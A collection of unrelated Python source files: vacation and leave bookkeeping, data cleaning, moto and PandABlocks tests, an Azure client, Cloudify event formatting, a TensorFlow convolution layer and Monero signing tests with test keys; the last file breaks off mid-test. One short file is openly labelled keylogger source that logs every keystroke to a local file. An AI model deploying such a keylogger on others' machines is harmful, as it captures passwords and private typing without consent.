wp.extend (db.time_wp.filter (None, d1, srt))
d1 = dict (d, bookers = user, has_expiration_date = False)
wp.extend (db.time_wp.filter (None, d1, srt))
d1 = dict (d, bookers = user, time_end = '%s;' % dt)
wp.extend (db.time_wp.filter (None, d1, srt))
else :
d1 = dict (d, has_expiration_date = False)
wp.extend (db.time_wp.filter (None, d1, srt))
d1 = dict (d, time_end = '%s;' % dt)
wp.extend (db.time_wp.filter (None, d1, srt))
# Filter again via db to get sorting right
return db.time_wp.filter (wp, {}, sort = srt)
# end def valid_wps
def valid_leave_wps (db, user = None, date = None, srt = None, thawed = None) :
""" If thawed is given, find only WPs with an end-time > freeze date
If thawed *and* a date is given we use the *later* date
Note that for thawed to work a user must be given
"""
if thawed and user :
freeze = freeze_date (db, user)
if freeze and date :
date = max (freeze, date)
elif freeze :
date = freeze
d = {'project.approval_required' : True}
return valid_wps (db, d, user, date, srt, future = True)
# end def valid_leave_wps
def valid_leave_projects (db) :
return db.time_project.filter (None, dict (approval_required = True))
# end def valid_leave_projects
def vac_get_user_dynamic (db, user, ctype, date) :
""" Get user_dynamic record for a vacation computation on the given
date. Note that there are cases where no dyn user record exists
exactly for the date but before -- or after. If the record
starts a vacation period (e.g. an initial absolute vacation
correction) there doesn't necessarily already exist a dynamic
user record. On the other hand when computing the vacation at
the end of a period no dyn user record may be available anymore
(e.g., because the person has left).
"""
dyn = user_dynamic.get_user_dynamic (db, user, date)
if not dyn :
dyn = user_dynamic.find_user_dynamic (db, user, date, '-')
if ( dyn
and ( dyn.contract_type != ctype
or not dyn.vacation_month
or not dyn.vacation_day
)
) :
dyn = vac_prev_user_dynamic (db, dyn, ctype)
if not dyn :
dyn = user_dynamic.find_user_dynamic (db, user, date, '+')
if ( dyn
and ( dyn.contract_type != ctype
or not dyn.vacation_month
or not dyn.vacation_day
)
) :
dyn = vac_next_user_dynamic (db, dyn, ctype)
return dyn
# end def vac_get_user_dynamic
def vac_next_user_dynamic (db, dyn, ctype = -1) :
if ctype == -1 :
ctype = dyn.contract_type
dyn = user_dynamic.next_user_dynamic (db, dyn)
while ( dyn
and ( dyn.contract_type != ctype
or not dyn.vacation_month
or not dyn.vacation_day
)
) :
dyn = user_dynamic.next_user_dynamic (db, dyn)
return dyn
# end def vac_next_user_dynamic
def vac_prev_user_dynamic (db, dyn, ctype = -1) :
if ctype == -1 :
ctype = dyn.contract_type
dyn = user_dynamic.prev_user_dynamic (db, dyn)
while ( dyn
and ( dyn.contract_type != ctype
or not dyn.vacation_month
or not dyn.vacation_day
)
) :
dyn = user_dynamic.prev_user_dynamic (db, dyn)
return dyn
# end def vac_prev_user_dynamic
def need_hr_approval \
(db, tp, user, ctype, first_day, last_day, stname, booked = False) :
if tp.approval_hr :
return True
if stname != 'submitted' :
return False
if not tp.is_vacation :
# Flexitime
if tp.no_overtime and tp.max_hours == 0 :
dyn = user_dynamic.get_user_dynamic (db, user, first_day)
if not dyn or not dyn.all_in :
return False
fd = first_day
if first_day.year != last_day.year :
while fd.year != last_day.year :
eoy = common.end_of_year (fd)
rem = flexi_remain (db, user, fd, ctype)
dur = leave_days (db, user, fd, eoy)
if rem - dur < 0 :
return True
fd = eoy + common.day
rem = flexi_remain (db, user, fd, ctype)
dur = leave_days (db, user, fd, last_day)
return rem - dur < 0
else :
return False
day = common.day
ed = next_yearly_vacation_date (db, user, ctype, last_day) - day
vac = remaining_vacation (db, user, ctype, ed)
assert vac is not None
dur = leave_days (db, user, first_day, last_day)
# don't count duration if this is already booked, so we would count
# this vacation twice.
if booked :
dur = 0
return ceil (vac) - dur < 0
# end def need_hr_approval
def vacation_params (db, user, date, vc, hv = False) :
""" Compute parameters needed for initializing vacation report,
returns the last total vacation (initial carry-over for start of
vacation or consolidated vacation from last year) and the
current carry (initial carry-over for start of vacation or last
remaining vacation). This is used for summary data in the
summary report and for vacation display in the leave mask.
"""
day = common.day
carry = None
ltot = None
ctype = vc.contract_type
yday = next_yearly_vacation_date (db, user, ctype, date) - day
if yday :
pd = prev_yearly_vacation_date (db, user, ctype, yday)
if not pd or vc.date == pd :
pd = vc.date
carry = ltot = vc.days
else :
carry = remaining_vacation (db, user, ctype, pd - day)
ltot = consolidated_vacation (db, user, ctype, pd - day)
carry = carry or 0.0
ltot = ltot or 0.0
return yday, pd, carry, ltot
# end def vacation_params
def get_current_ctype (db, user, dt = None) :
if dt is None :
dt = Date ('.')
dyn = user_dynamic.get_user_dynamic (db, user, dt)
if not dyn :
return None
ctype = dyn.contract_type
return ctype
# end def get_current_ctype
def flexi_alliquot (db, user, date_in_year, ctype) :
""" Loop over all dyn records in this year and use only those with
all-in set. For those we count the days and compute the
year-alliquot number of max_flexitime days.
"""
y = common.start_of_year (date_in_year)
eoy = common.end_of_year (y)
flex = 0.0
dsecs = 0.0
ds = 24 * 60 * 60
for dyn in user_dynamic.user_dynamic_year_iter (db, user, y) :
if not dyn.all_in or dyn.contract_type != ctype :
continue
vf = dyn.valid_from
if vf < y :
vf = y
vt = dyn.valid_to
if not vt or vt > eoy + common.day :
vt = eoy + common.day
flex += (vt - vf).as_seconds () * (dyn.max_flexitime or 0)
dsecs += (vt - vf).as_seconds ()
assert dsecs / ds <= 366
if not flex :
return 0.0
days = float ((eoy + common.day - y).as_seconds () / ds)
flex /= ds
return ceil (flex / days)
# end def flexi_alliquot
def avg_hours_per_week_this_year (db, user, date_in_year) :
""" Loop over all dyn records in this year and use only those with
all-in set. For those we count the hours and compute the
average over all all-in days.
"""
y = common.start_of_year (date_in_year)
eoy = common.end_of_year (y)
now = Date ('.')
if eoy > now :
eoy = now
hours = 0.0
dsecs = 0.0
ds = 24 * 60 * 60
for dyn in user_dynamic.user_dynamic_year_iter (db, user, y) :
if not dyn.all_in :
continue
vf = dyn.valid_from
if vf < y :
vf = y
vt = dyn.valid_to
if not vt or vt > eoy + common.day :
vt = eoy + common.day
dsecs += (vt - vf).as_seconds ()
drs = db.daily_record.filter \
(None, dict (date = common.pretty_range (vf, vt), user = user))
for drid in drs :
dr = db.daily_record.getnode (drid)
dur = user_dynamic.update_tr_duration (db, dr)
hours += dur
days = dsecs / ds
assert days <= 366
if not days :
return 0
avgday = hours / float (days)
return avgday * 7
# end def avg_hours_per_week_this_year
def get_all_in_ctypes (db, user, y) :
ctypes = set ()
for dyn in user_dynamic.user_dynamic_year_iter (db, user, y) :
if not dyn.all_in :
continue
ctypes.add (dyn.contract_type)
return ctypes
# end def get_all_in_ctypes
def flexi_remain (db, user, date_in_year, ctype) :
y = common.start_of_year (date_in_year)
eoy = common.end_of_year (y)
fa = flexi_alliquot (db, user, date_in_year, ctype)
acpt = db.leave_status.lookup ('accepted')
cnrq = db.leave_status.lookup ('cancel requested')
if not fa :
return 0
sd = 0
dyn = user_dynamic.get_user_dynamic (db, user, y)
if not dyn :
dyn = user_dynamic.first_user_dynamic (db, user, y)
while dyn :
# Check the case that we found a dyn user record far in the past
if dyn.valid_to and dyn.valid_to < y :
dyn = user_dynamic.next_user_dynamic (db, dyn)
continue
if dyn.contract_type == ctype :
b = dyn.valid_from
if b < y :
b = y
if b > eoy :
break
e = dyn.valid_to
if e > eoy or not e :
e = eoy
else :
e -= common.day
ct = dyn.contract_type
if dyn.all_in :
sd += flexitime_submission_days (db, user, ct, b, e, acpt, cnrq)
dyn = user_dynamic.next_user_dynamic (db, dyn)
return fa - sd
# end def flexi_remain
def fix_vacation (db, uid, date_from = None, date_to = None) :
""" Fix vacation for a user where the dyn. user record has been
changed *after* the user already booked vacation.
We search for all time-records with a daily-record in state
'leave' since the last frozen time or date_from if given.
"""
#print ("fix_vacation: %s %s %s" % (uid, date_from, date_to))
if date_from is None :
date_from = Date ('2000-01-01')
frozen = db.daily_record_freeze.filter \
(None, dict (user = uid, frozen = True), sort = ('-', 'date'))
if frozen :
frozen = db.daily_record_freeze.getnode (frozen [0])
date_from = frozen.date + common.day
leave = db.daily_record_status.lookup ('leave')
d = dict ()
d ['daily_record.user'] = uid
d ['daily_record.date'] = common.pretty_range (date_from, date_to)
d ['daily_record.status'] = leave
trs = db.time_record.filter (None, d)
for trid in trs :
tr = db.time_record.getnode (trid)
dr = db.daily_record.getnode (tr.daily_record)
wp = db.time_wp.getnode (tr.wp)
tp = db.time_project.getnode (wp.project)
if not tp.is_vacation and not tp.is_public_holiday :
continue
du = leave_duration (db, uid, dr.date, tp.is_public_holiday)
if tr.duration != du :
#print "Wrong: time_record%s: %s->%s" % (trid, tr.duration, du)
db.time_record.set (trid, duration = du)
# end def fix_vacation
### __END__
|
from datetime import datetime
from os import listdir
import pandas
from application_logging.logger import App_Logger
class dataTransform:
"""
This class shall be used for transforming the Good Raw Training Data before loading it in Database!!.
Written By: iNeuron Intelligence
Version: 1.0
Revisions: None
"""
def __init__(self):
self.goodDataPath = "Training_Raw_files_validated/Good_Raw"
self.logger = App_Logger()
def replaceMissingWithNull(self):
"""
Method Name: replaceMissingWithNull
Description: This method replaces the missing values in columns with "NULL" to
store in the table. We are using substring in the first column to
keep only "Integer" data for ease up the loading.
This column is anyways going to be removed during training.
Written By: iNeuron Intelligence
Version: 1.0
Revisions: None
"""
log_file = open("Training_Logs/dataTransformLog.txt", 'a+')
try:
onlyfiles = [f for f in listdir(self.goodDataPath)]
for file in onlyfiles:
csv = pandas.read_csv(self.goodDataPath+"/" + file)
csv.fillna('NULL',inplace=True)
csv.to_csv(self.goodDataPath+ "/" + file, index=None, header=True)
self.logger.log(log_file," %s: File Transformed successfully!!" % file)
#log_file.write("Current Date :: %s" %date +"\t" + "Current time:: %s" % current_time + "\t \t" + + "\n")
except Exception as e:
self.logger.log(log_file, "Data Transformation failed because:: %s" % e)
#log_file.write("Current Date :: %s" %date +"\t" +"Current time:: %s" % current_time + "\t \t" + "Data Transformation failed because:: %s" % e + "\n")
log_file.close()
log_file.close()
|
from freezegun import freeze_time
import sure # noqa # pylint: disable=unused-import
from moto.swf.models import HistoryEvent
@freeze_time("2015-01-01 12:00:00")
def test_history_event_creation():
he = HistoryEvent(123, "DecisionTaskStarted", scheduled_event_id=2)
he.event_id.should.equal(123)
he.event_type.should.equal("DecisionTaskStarted")
he.event_timestamp.should.equal(1420113600.0)
@freeze_time("2015-01-01 12:00:00")
def test_history_event_to_dict_representation():
he = HistoryEvent(123, "DecisionTaskStarted", scheduled_event_id=2)
he.to_dict().should.equal(
{
"eventId": 123,
"eventType": "DecisionTaskStarted",
"eventTimestamp": 1420113600.0,
"decisionTaskStartedEventAttributes": {"scheduledEventId": 2},
}
)
def test_history_event_breaks_on_initialization_if_not_implemented():
HistoryEvent.when.called_with(123, "UnknownHistoryEvent").should.throw(
NotImplementedError
)
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from copy import deepcopy
from typing import Any, Awaitable, Optional, TYPE_CHECKING
from azure.core import AsyncPipelineClient
from azure.core.rest import AsyncHttpResponse, HttpRequest
from msrest import Deserializer, Serializer
from ._configuration import AutoRestComplexTestServiceConfiguration
from .operations import (
ArrayOperations,
BasicOperations,
DictionaryOperations,
FlattencomplexOperations,
InheritanceOperations,
PolymorphicrecursiveOperations,
PolymorphismOperations,
PrimitiveOperations,
ReadonlypropertyOperations,
)
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Dict
class AutoRestComplexTestService:
"""Test Infrastructure for AutoRest.
:ivar basic: BasicOperations operations
:vartype basic: bodycomplexpython3only.aio.operations.BasicOperations
:ivar primitive: PrimitiveOperations operations
:vartype primitive: bodycomplexpython3only.aio.operations.PrimitiveOperations
:ivar array: ArrayOperations operations
:vartype array: bodycomplexpython3only.aio.operations.ArrayOperations
:ivar dictionary: DictionaryOperations operations
:vartype dictionary: bodycomplexpython3only.aio.operations.DictionaryOperations
:ivar inheritance: InheritanceOperations operations
:vartype inheritance: bodycomplexpython3only.aio.operations.InheritanceOperations
:ivar polymorphism: PolymorphismOperations operations
:vartype polymorphism: bodycomplexpython3only.aio.operations.PolymorphismOperations
:ivar polymorphicrecursive: PolymorphicrecursiveOperations operations
:vartype polymorphicrecursive:
bodycomplexpython3only.aio.operations.PolymorphicrecursiveOperations
:ivar readonlyproperty: ReadonlypropertyOperations operations
:vartype readonlyproperty: bodycomplexpython3only.aio.operations.ReadonlypropertyOperations
:ivar flattencomplex: FlattencomplexOperations operations
:vartype flattencomplex: bodycomplexpython3only.aio.operations.FlattencomplexOperations
:keyword endpoint: Service URL. Default value is 'http://localhost:3000'.
:paramtype endpoint: str
"""
def __init__(self, *, endpoint: str = "http://localhost:3000", **kwargs: Any) -> None:
self._config = AutoRestComplexTestServiceConfiguration(**kwargs)
self._client = AsyncPipelineClient(base_url=endpoint, config=self._config, **kwargs)
self._serialize = Serializer()
self._deserialize = Deserializer()
self._serialize.client_side_validation = False
self.basic = BasicOperations(self._client, self._config, self._serialize, self._deserialize)
self.primitive = PrimitiveOperations(self._client, self._config, self._serialize, self._deserialize)
self.array = ArrayOperations(self._client, self._config, self._serialize, self._deserialize)
self.dictionary = DictionaryOperations(self._client, self._config, self._serialize, self._deserialize)
self.inheritance = InheritanceOperations(self._client, self._config, self._serialize, self._deserialize)
self.polymorphism = PolymorphismOperations(self._client, self._config, self._serialize, self._deserialize)
self.polymorphicrecursive = PolymorphicrecursiveOperations(
self._client, self._config, self._serialize, self._deserialize
)
self.readonlyproperty = ReadonlypropertyOperations(
self._client, self._config, self._serialize, self._deserialize
)
self.flattencomplex = FlattencomplexOperations(self._client, self._config, self._serialize, self._deserialize)
def send_request(self, request: HttpRequest, **kwargs: Any) -> Awaitable[AsyncHttpResponse]:
"""Runs the network request through the client's chained policies.
>>> from azure.core.rest import HttpRequest
>>> request = HttpRequest("GET", "https://www.example.org/")
<HttpRequest [GET], url: 'https://www.example.org/'>
>>> response = await client.send_request(request)
<AsyncHttpResponse: 200 OK>
For more information on this code flow, see https://aka.ms/azsdk/python/protocol/quickstart
:param request: The network request you want to make. Required.
:type request: ~azure.core.rest.HttpRequest
:keyword bool stream: Whether the response payload will be streamed. Defaults to False.
:return: The response of your network call. Does not do error handling on your response.
:rtype: ~azure.core.rest.AsyncHttpResponse
"""
request_copy = deepcopy(request)
request_copy.url = self._client.format_url(request_copy.url)
return self._client.send_request(request_copy, **kwargs)
async def close(self) -> None:
await self._client.close()
async def __aenter__(self) -> "AutoRestComplexTestService":
await self._client.__aenter__()
return self
async def __aexit__(self, *exc_details) -> None:
await self._client.__aexit__(*exc_details)
|
########
# Copyright (c) 2015 GigaSpaces Technologies Ltd. All rights reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# * See the License for the specific language governing permissions and
# * limitations under the License.
from cloudify._compat import StringIO
HIGH_VERBOSE = 3
MEDIUM_VERBOSE = 2
LOW_VERBOSE = 1
NO_VERBOSE = 0
class Event(object):
def __init__(self, event, verbosity_level=NO_VERBOSE):
self._event = event
self._verbosity_level = verbosity_level
def __str__(self):
deployment_id = self.deployment_id
printable_timestamp = self.printable_timestamp
event_type_indicator = self.event_type_indicator
message = self.text
info = self.operation_info
if info: # spacing in between of the info and the message
info += ' '
return u'{0} {1} {2} {3}{4}'.format(
printable_timestamp,
event_type_indicator,
deployment_id,
info,
message)
@property
def has_output(self):
return (not self.is_log_message or
self._verbosity_level >= MEDIUM_VERBOSE or
self.log_level != 'DEBUG')
@property
def operation_info(self):
operation = self.operation
node_id = self.node_id
source_id = self.source_id
target_id = self.target_id
context = self._event['context']
group = context.get('group')
policy = context.get('policy')
trigger = context.get('trigger')
if source_id is not None:
info = '{0}->{1}|{2}'.format(source_id, target_id, operation)
else:
info_elements = [
e for e in [node_id, operation, group, policy, trigger]
if e is not None]
info = '.'.join(info_elements)
if info:
info = '[{0}]'.format(info)
return info
@property
def text(self):
message = self._event['message']['text']
if self.is_log_message:
message = u'{0}: {1}'.format(self.log_level, message)
elif (self.event_type in ('task_rescheduled', 'task_failed')):
causes = self._event['context'].get('task_error_causes', [])
if causes:
multiple_causes = len(causes) > 1
causes_out = StringIO()
if multiple_causes:
causes_out.write('Causes (most recent cause last):\n')
for cause in causes:
if multiple_causes:
causes_out.write('{0}\n'.format('-' * 32))
tb = cause.get('traceback')
if tb:
causes_out.write(tb)
causes = causes_out.getvalue()
if causes:
message = u'{0}\n{1}'.format(message, causes)
return message
@property
def log_level(self):
return self._event['level'].upper()
@property
def timestamp(self):
return self._event.get('@timestamp') or \
self._event.get('reported_timestamp') or \
self._event['timestamp']
@property
def printable_timestamp(self):
return self.timestamp.replace('T', ' ').replace('Z', '')
@property
def event_type_indicator(self):
return 'LOG' if self.is_log_message else 'CFY'
@property
def operation(self):
op = self._event['context'].get('operation')
if op is None:
return None
return op.split('.')[-1]
@property
def node_id(self):
return self._event['context'].get('node_id')
@property
def source_id(self):
return self._event['context'].get('source_id')
@property
def target_id(self):
return self._event['context'].get('target_id')
@property
def deployment_id(self):
return '<{0}>'.format(self._event['context']['deployment_id'])
@property
def event_type(self):
return self._event.get('event_type') # not available for logs
@property
def is_log_message(self):
return 'cloudify_log' in self._event['type']
|
# Keylogger by Mahesh Sawant.
import pynput
from pynput.keyboard import Key,Listener
count = 0
keys = []
def on_press(key):
global keys, count
keys.append(key)
count+=1
print("{0} pressed".format(key))
if count >= 1:
count = 0
write_file(keys)
keys = []
def write_file(keys):
with open("log.txt","a") as f:
for key in keys:
k=str(key).replace("'","")
if k.find("backspace") > 0:
f.write("Backspace_key ")
elif k.find("enter") > 0:
f.write('\n')
elif k.find("shift") > 0:
f.write("Shift_key ")
elif k.find("space") > 0:
f.write(" ")
elif k.find("caps_lock") >0 :
f.write("caps_Lock_key ")
elif k.find("Key"):
f.write(k)
def on_release(key):
global exit
if key == Key.esc:
exit += 1
if exit == 5 :
return False
exit = 0
with Listener(on_press=on_press, on_release=on_release) as listener:
listener.join()
|
import tflib as lib
from sn import spectral_normed_weight
import numpy as np
import tensorflow as tf
_default_weightnorm = False
def enable_default_weightnorm():
global _default_weightnorm
_default_weightnorm = True
_weights_stdev = None
def set_weights_stdev(weights_stdev):
global _weights_stdev
_weights_stdev = weights_stdev
def unset_weights_stdev():
global _weights_stdev
_weights_stdev = None
def Conv2D(name, input_dim, output_dim, filter_size, inputs, he_init=True, mask_type=None, stride=1, weightnorm=None,
spectralnorm=False, update_collection=None, biases=True, gain=1.):
"""
inputs: tensor of shape (batch size, num channels, height, width)
mask_type: one of None, 'a', 'b'
returns: tensor of shape (batch size, num channels, height, width)
"""
def scope_has_variables(scope):
return len(tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope=scope.name)) > 0
#with tf.name_scope(name) as scope:
with tf.variable_scope(name) as scope:
if scope_has_variables(scope):
scope.reuse_variables()
if mask_type is not None:
mask_type, mask_n_channels = mask_type
mask = np.ones(
(filter_size, filter_size, input_dim, output_dim),
dtype='float32'
)
center = filter_size // 2
# Mask out future locations
# filter shape is (height, width, input channels, output channels)
mask[center+1:, :, :, :] = 0.
mask[center, center+1:, :, :] = 0.
# Mask out future channels
for i in xrange(mask_n_channels):
for j in xrange(mask_n_channels):
if (mask_type=='a' and i >= j) or (mask_type=='b' and i > j):
mask[
center,
center,
i::mask_n_channels,
j::mask_n_channels
] = 0.
def uniform(stdev, size):
return np.random.uniform(
low=-stdev * np.sqrt(3),
high=stdev * np.sqrt(3),
size=size
).astype('float32')
fan_in = input_dim * filter_size**2
fan_out = output_dim * filter_size**2 / (stride**2)
if mask_type is not None: # only approximately correct
fan_in /= 2.
fan_out /= 2.
if he_init:
filters_stdev = np.sqrt(4./(fan_in+fan_out))
else: # Normalized init (Glorot & Bengio)
filters_stdev = np.sqrt(2./(fan_in+fan_out))
if _weights_stdev is not None:
filter_values = uniform(
_weights_stdev,
(filter_size, filter_size, input_dim, output_dim)
)
else:
filter_values = uniform(
filters_stdev,
(filter_size, filter_size, input_dim, output_dim)
)
# print "WARNING IGNORING GAIN"
filter_values *= gain
filters = lib.param(name+'.Filters', filter_values)
if weightnorm == None:
weightnorm = _default_weightnorm
if weightnorm:
norm_values = np.sqrt(np.sum(np.square(filter_values), axis=(0,1,2)))
target_norms = lib.param(
name + '.g',
norm_values
)
with tf.name_scope('weightnorm') as scope:
norms = tf.sqrt(tf.reduce_sum(tf.square(filters), reduction_indices=[0,1,2]))
filters = filters * (target_norms / norms)
if spectralnorm:
filters = spectral_normed_weight(W=filters, update_collection=update_collection)
if mask_type is not None:
with tf.name_scope('filter_mask'):
filters = filters * mask
result = tf.nn.conv2d(
input=inputs,
filter=filters,
strides=[1, 1, stride, stride],
padding='SAME',
data_format='NCHW'
)
if biases:
_biases = lib.param(
name+'.Biases',
np.zeros(output_dim, dtype='float32')
)
result = tf.nn.bias_add(result, _biases, data_format='NCHW')
return result
|
import pytest
from monero_client.monero_types import SigType, Keys
@pytest.mark.incremental
class TestSignature:
"""Monero signature test."""
@staticmethod
@pytest.fixture(autouse=True, scope="class")
def state():
sender = Keys(
public_view_key=bytes.fromhex("865cbfab852a1d1ccdfc7328e4dac90f78"
"fc2154257d07522e9b79e637326dfa"),
public_spend_key=bytes.fromhex("dae41d6b13568fdd71ec3d20c2f614c65"
"fe819f36ca5da8d24df3bd89b2bad9d"),
secret_view_key=bytes.fromhex("0f3fe25d0c6d4c94dde0c0bcc214b233e9"
"c72927f813728b0f01f28f9d5e1201"),
secret_spend_key=bytes.fromhex("3b094ca7218f175e91fa2402b4ae239a2"
"fe8262792a3e718533a1a357a1e4109"),
addr="5A8FgbMkmG2e3J41sBdjvjaBUyz8qHohsQcGtRf63qEUTMBvmA45fpp5pSa"
"cMdSg7A3b71RejLzB8EkGbfjp5PELVHCRUaE"
)
receiver = Keys(
public_view_key=bytes.fromhex("2e49ad29a1bfd98ab05c88713463d55212"
"0906b1be380211745695134e183ed0"),
public_spend_key=bytes.fromhex("392c4432e5a15aea227e6579a8da7d9f4"
"6fb78565e18e7f0b278f3f1a1468696"),
secret_view_key=bytes.fromhex("57fd02a94c7486722b1f9798dc0fb931d5"
"477a605a6fd6593573b438c02a890f"),
secret_spend_key=None,
addr="53zomVuwRkDgAQDY6qKUP6TeBy5JqXSJzhG4i7447yMXS7wdt4hKh6gQCTT"
"a9FiYNpEjBoHZ9iTww3vL96P1hcmTQXvpFAo"
)
return {"sender": sender,
"receiver": receiver,
"amount": 10**12, # 1.0 XMR
"tx_pub_key": None,
"_tx_priv_key": None,
"_ak_amount": [],
"blinded_amount": [],
"blinded_mask": [],
"y": []}
@staticmethod
def test_set_sig(monero):
major, minor, patch = monero.reset_and_get_version(
monero_client_version=b"0.17.0.0"
) # type: int, int, int
assert (major, minor) == (1, 7) # version of the Monero app
sig_mode: SigType = monero.set_signature_mode(sig_type=SigType.REAL)
assert sig_mode == SigType.REAL
@staticmethod
def test_open_tx(monero, state):
(tx_pub_key,
_tx_priv_key,
fake_view_key,
fake_spend_key) = monero.open_tx() # type: bytes, bytes, bytes, bytes
assert fake_view_key == b"\x00" * 32
assert fake_spend_key == b"\xff" * 32
state["tx_pub_key"] = tx_pub_key
state["_tx_priv_key"] = _tx_priv_key
@staticmethod
def test_gen_txout_keys(monero, state):
_ak_amount, out_ephemeral_pub_key = monero.gen_txout_keys(
_tx_priv_key=state["_tx_priv_key"],
tx_pub_key=state["tx_pub_key"],
dst_pub_view_key=state["receiver"].public_view_key,
dst_pub_spend_key=state["receiver"].public_spend_key,
output_index=0,
is_change_addr=False,
is_subaddress=False
) # type: bytes, bytes
state["_ak_amount"].append(_ak_amount) # _ak_amount_t
@staticmethod
def test_prefix_hash(monero, button):
expected: bytes = bytes.fromhex("9a259973bf721120aceae3d8d40696c0"
"7470331e386028753123f37fee36926b")
# should ask for timelock validation
monero.prefix_hash_init(button=button, version=0, timelock=2147483650)
result: bytes = monero.prefix_hash_update(
index=1,
payload=b"",
is_last=True
)
assert result == expected
@staticmethod
def test_gen_commitment_mask(monero, state):
assert len(state["_ak_amount"]) != 0
s: bytes = monero.gen_commitment_mask(state["_ak_amount"][0])
state["y"].append(s) # y_t
@staticmethod
def test_blind(monero, state):
assert len(state["y"]) != 0
assert len(state["_ak_amount"]) != 0
blinded_mask, blinded_amount = monero.blind(
_ak_amount=state["_ak_amount"][0],
mask=state["y"][0],
amount=state["amount"],
is_short=False
) # type: bytes, bytes
mask, amount = monero.unblind(
_ak_amount=state["_ak_amount"][0],
blinded_mask=blinded_mask,
blinded_amount=blinded_amount,
is_short=False
) # type: bytes, bytes
assert state["y"][0] == mask
assert state["amount"] == int.from_bytes(amount, byteorder="big")
state["blinded_mask"].append(blinded_mask)
state["blinded_amount"].append(blinded_amount)
@staticmethod
def test_validate(monero, button, state):
assert len(state["y"]) != 0
assert len(state["_ak_amount"]) != 0
assert len(state["blinded_amount"]) != 0
assert len(state["blinded_mask"]) != 0
fee: int = 100000000 # 0.0001 XMR
# should ask for fee validation
monero.validate_prehash_init(button=button,
index=1, # start at 1
txntype=0,
txnfee=fee)
# monero_client.validate_prehash_update(
# index=1,
# is_short=False,
# is_change_addr=False,
# is_subaddress=False,
# dst_pub_view_key=state["receiver"].public_view_key,
# dst_pub_spend_key=state["receiver"].public_spend_key,
# _ak_amount=state["_ak_amount"][0],
# commitment=...,
# blinded_amount=state["blinded_amount"][0],
# blinded_mask=state["blinded_mask"][0],
# is_last=True
# )
@staticmethod
def test_close_tx(monero):
monero.close_tx()
|
import unittest
from collections import OrderedDict
from mock import ANY, Mock
from malcolm.core import (
Alarm,
BooleanMeta,
ChoiceMeta,
NumberMeta,
Process,
Queue,
StringMeta,
Subscribe,
TimeStamp,
)
from malcolm.modules.pandablocks.controllers.pandablockcontroller import (
PandABlockController,
)
from malcolm.modules.pandablocks.pandablocksclient import BlockData, FieldData
class PandABoxBlockMakerTest(unittest.TestCase):
def setUp(self):
self.client = Mock()
self.process = Process()
self.process.start()
def tearDown(self):
self.process.stop()
def test_block_fields_adder(self):
fields = OrderedDict()
block_data = BlockData(2, "Adder description", fields)
fields["INPA"] = FieldData("pos_mux", "", "Input A", ["A.OUT", "B.OUT"])
fields["INPB"] = FieldData("pos_mux", "", "Input B", ["A.OUT", "B.OUT"])
fields["DIVIDE"] = FieldData(
"param", "enum", "Divide output", ["/1", "/2", "/4"]
)
fields["OUT"] = FieldData("pos_out", "", "Output", ["No", "Capture"])
fields["HEALTH"] = FieldData("read", "enum", "What's wrong", ["OK", "Very Bad"])
o = PandABlockController(self.client, "MRI", "ADDER1", block_data, "/docs")
self.process.add_controller(o)
b = self.process.block_view("MRI:ADDER1")
assert list(b) == [
"meta",
"health",
"icon",
"label",
"help",
"inputs",
"inpa",
"inpb",
"parameters",
"divide",
"outputs",
"out",
]
group = b.inputs
assert group.meta.tags == ["widget:group", "config:1"]
inpa = b.inpa
assert inpa.meta.writeable is True
assert inpa.meta.typeid == ChoiceMeta.typeid
assert inpa.meta.tags == [
"group:inputs",
"sinkPort:int32:ZERO",
"widget:combo",
"config:1",
]
assert inpa.meta.choices == ["A.OUT", "B.OUT"]
inpa.put_value("A.OUT")
self.client.set_field.assert_called_once_with("ADDER1", "INPA", "A.OUT")
self.client.reset_mock()
divide = b.divide
assert divide.meta.writeable is True
assert divide.meta.typeid == ChoiceMeta.typeid
assert divide.meta.tags == ["group:parameters", "widget:combo", "config:1"]
assert divide.meta.choices == ["/1", "/2", "/4"]
out = b.out
assert out.meta.writeable is False
assert out.meta.typeid == NumberMeta.typeid
assert out.meta.dtype == "int32"
assert out.meta.tags == [
"group:outputs",
"sourcePort:int32:ADDER1.OUT",
"widget:textupdate",
]
queue = Queue()
subscribe = Subscribe(path=["MRI:ADDER1", "out"], delta=True)
subscribe.set_callback(queue.put)
o.handle_request(subscribe)
delta = queue.get(timeout=1)
assert delta.changes[0][1]["value"] == 0
ts = TimeStamp()
o.handle_changes({"OUT": "145"}, ts)
delta = queue.get(timeout=1)
assert delta.changes == [
[["value"], 145],
[["timeStamp"], ts],
]
subscribe = Subscribe(path=["MRI:ADDER1", "health"], delta=True)
subscribe.set_callback(queue.put)
o.handle_request(subscribe)
delta = queue.get(timeout=1)
assert delta.changes[0][1]["value"] == "OK"
ts = TimeStamp()
o.handle_changes({"HEALTH": "Very Bad"}, ts)
delta = queue.get(timeout=1)
assert delta.changes == [
[["value"], "Very Bad"],
[["alarm"], Alarm.major("Very Bad")],
[["timeStamp"], ts],
]
o.handle_changes({"HEALTH": "OK"}, ts)
delta = queue.get(timeout=1)
assert delta.changes == [
[["value"], "OK"],
[["alarm"], Alarm.ok],
[["timeStamp"], ts],
]
def test_block_fields_pulse(self):
fields = OrderedDict()
block_data = BlockData(4, "Pulse description", fields)
fields["DELAY"] = FieldData("time", "", "Time", [])
fields["INP"] = FieldData("bit_mux", "", "Input", ["ZERO", "X.OUT", "Y.OUT"])
fields["OUT"] = FieldData("bit_out", "", "Output", [])
fields["ERR_PERIOD"] = FieldData("read", "bit", "Error", [])
o = PandABlockController(self.client, "MRI", "PULSE2", block_data, "/docs")
self.process.add_controller(o)
b = self.process.block_view("MRI:PULSE2")
assert list(b) == [
"meta",
"health",
"icon",
"label",
"help",
"parameters",
"delay",
"delayUnits",
"inputs",
"inp",
"inpDelay",
"outputs",
"out",
"readbacks",
"errPeriod",
]
assert b.meta.label == "Pulse description 2"
assert b.label.value == "Pulse description 2"
# check setting label
